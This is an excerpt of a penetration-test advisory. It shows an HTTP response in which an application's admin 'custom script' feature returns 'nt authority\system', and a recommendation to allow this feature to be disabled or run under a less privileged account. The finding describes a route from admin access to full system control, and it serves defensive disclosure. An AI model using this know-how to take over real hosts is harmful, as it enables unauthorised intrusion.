Content-Length: 197494


...[SNIP]...

</table></td> <td width="10%" valign="top" align="right"><a class="linkblacktxt" href="javascript:hideStatusTable();"><img src="images/delete.gif" width="9" height="9" border="0"> Close</a><td></tr> <tr><td colspan="2" align="center"><span align="center" class="blacktxt">Custom script result: nt authority\system </span></span></td></tr></table></td> <td background="images/blue/gray_right_bgline.gif"><img src="images/blue/gray_right_bgline.gif" width="6" height="1"></td></tr><tr><td width="6" height="6" valign="top"><img src="images/blue/gray_botleft_curve.gif" width="6" height="6"></td> <td height="6" background="images/blue/gray_bot_bgline.gif"><img src="images/blue/gray_bot_bgline.gif" width="1" height="6"></td> <td width="6" height="6" valign="top"><img src="images/blue/gray_botright_curve.gif" width="6" height="6"></td></tr></table></td></tr></table><br></div>

Recommendation:

Since this is purely an informational finding, noted only to help anyone who may stumble upon an admin account for this application during a penetration test, there is no real recommendation. However, there should be the ability to disable this functionality and/or use a different system-level account during installation to prevent potential system compromise.